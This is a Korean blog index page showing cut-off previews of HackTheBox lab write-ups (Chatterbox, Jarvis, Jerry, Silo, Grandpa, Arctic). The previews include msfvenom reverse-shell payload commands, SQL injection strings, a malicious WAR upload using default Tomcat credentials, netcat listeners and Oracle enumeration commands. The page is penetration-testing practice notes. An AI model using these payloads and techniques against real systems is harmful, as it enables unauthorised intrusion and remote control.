워게임/hackthebox36 chatterbox 롸업 정리 nmap 결과 죽어도 안나온다.... 박스가 죽은건지,,, 삽질하다가 그냥 롸업에 나온 nmap 결과보고 익스해본다. searchsploit achat 딱봐도 첫 번째걸 봐야겠지? 여기서 눈에 띄는 부분이 있다. - payload의 length가 1152보다 크면 안되는 것 같다. 이보다 작은 크기의 리버스쉘을 생생해서 buf 대신 넣으면 될 듯 - msfvenom으로 리버스쉘 만드는 옵션 다 줬다. msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x.. 2021. 10. 12. jarvis 롸업 정리 nmap gobuster(삽질) not useful . . 10.10.10.143 뒤져보기 /room.php?cod=3 여기서 LFI, RFI 시도 후 안되니까 sqli 시도 /room.php?cod=3 or sleep(1)%23 -> 10초 딜레이되는 것을 보고 취약하구나 판단 SQL injection 1. 컬럼 개수 파악하기 ?cod=4 order by 6 7 8 -> 데이터가 없어진다.. 오류가 있다는 뜻 => 컬럼 7개 파악 2. 컬럼이 각각 어디에 위치하는지 구하기 ?cod=999 union select 1,2,3,4,5,6,7 3. sql injection으로 리버스 쉘 따기 로컬에 shell.php로 php 리버스 쉘코드 저장 python -m SimpleHTTPServer 5555 로컬에서.. 2021. 10. 10. jerry 롸업 정리(톰캣 배포 이해) nmap 삽질 searchsploit -> not vulnerable.. admin/admin nikto scan 엄청 느리다 => 여기서 /manage/html이 tomcat/s3cret로 뚫린다는 취약점이 나온다. tomcat/s3cret msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f war > shell.war nc -nlvp 1234 열어놓고 해당 war 업로드 후 http://10.10.10.95:8080/shell 접속 바로 system 권한의 쉘이 따진다. tomcat 웹 애플리케이션 배포 배포할 프로젝트를 war로 추출한다. war는 web application archive의 약자로 웹 애플리케이션을 배포하기 .. 2021. 10. 9. silo 롸업 정리(tns listener) nmap microsoft iis 8.5 버전은 취약하지 않다. RPC가 엄청 많이 보인다. TNS.. telnet으로 접속해봤는데 뭐만 입력하면 꺼져버린다. 139, 445포트는 smb.. smbmap, smbclient not working.... enumeration 80 : IIS server. gobuster를 돌려도 유의미한 결과를 얻을 수 없다. smb 관련해서는 smbclient로 접속 불가... tns listener... 이걸 한 번 이용해 익스해봐야겠다. tns listener 검색해보면 oracle,,,, oracle로 enumerate할 수 있는 도구를 찾는게 우선 ODAT sudo apt install odat odat sidguesser -s 10.10.10.82 -p 1521.. 2021. 10. 6. grandpa 롸업 정리- 다시해보기 nmap 전에 봤던 webdav다. granny였나 스캔 결과가 거의 동일해보인다. http method 관련해서 어떻게 했었던 것 같은데.. davtest --url http://10.10.10.14 이번에는 success인 확장자가 하나도 없다. searchsploit microsoft iis 6.0 롸업에서 말하길, Several people I know have tried to solve this box without using Metasploit and have failed to because the shell you get back is too unstable. Therefore, I’ll be solving this box using Metasploit. searchsploit의 결과로 나오.. 2021. 10. 5. arctic 롸업 정리 nmap 나는 rpc갖고 삽질했다. rpcclient, rpcinfo.. 등등 명령어를 실행했지만 아무것도 connect되지 않았고 별 다른게 나오지 않았다. 롸업을 보니 fmtp에 주목했다;;; 그리고 10.10.10.11:8500에 접속했다. 접속하는데 30초 정도 걸린다고 한다. 이게 접속이 언제 되는지 알고 기다릴까 /CFIDE/administrator 페이지 하나 넘어갈 때마다 30초 걸린다 말이 되냐 default password 나오지도 않는다. searchsploit coldfusion 8 버전 8 RCE로 하니까 바로 익스됐다. user.txt도 바로 확인할 수 있었다. 권한상승 windows exploit suggester 권한 관련, metasploit 아닌 것 걸러서 해보면 된다. .. 2021. 10. 5. 이전 1 2 3 4 ··· 6 다음